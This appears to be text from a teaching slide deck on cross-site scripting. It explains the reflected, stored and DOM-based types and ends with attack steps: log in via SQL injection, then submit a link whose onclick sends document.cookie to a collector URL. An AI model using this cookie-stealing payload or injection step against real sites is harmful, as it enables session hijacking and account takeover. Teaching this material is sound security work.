3. INTRODUCTION
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client side script into web pages viewed
by other.
4. ATTACK SCENARIO
An attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit,
essentially using the vulnerable website as a vehicle to deliver a malicious script to
the victim’s browser.
5. ATTACK INTENT
Hijacking Accounts
False Advertising & inserting hostile content
Changing of users settings
stealing other user’s cookies
Redirecting to other websites
6. TYPES OF ATTACK
REFLECTED (NON PERSISTANT)
STORED (PERSISTANT)
DOM BASED
7. REFLECTED(NON PERSISTANT)
Reflected XSS involves the reflecting of a malicious script off of a web application,
onto a user’s browser. The script is embedded into a link, and is only activated once
that link is clicked on.
An attacker convinces a user to follow a malicious URL which injects code into the
resulting page.
Now the attacker has full access to that pages content
8. STORED XSS
Stored XSS, also known as persistent XSS, is the more damaging of
the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
An attack can affect a large amount of users and the application can
also be infected by a XSS Virus or Worm
9. DOM XSS
Document Object Model
Standard object model for representing html or xhtml
Problem exists within the page’s client side script
If an attacker hosts a malicious site, which contains a vulnerable
website on a clients local system, a script can be injected
Now the attacker can run the privileges of that users browser on
their system.
11. Steps for XSS Attack
Step1 – Open techpand.org
Step2- Perform Login using SQL INJECTION(OR KNOW know
username and password)
Step3- open ADD New ACCOUNT
Step4- use below script as username
<a href=#
onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape
(document.cookie);">Dark</a>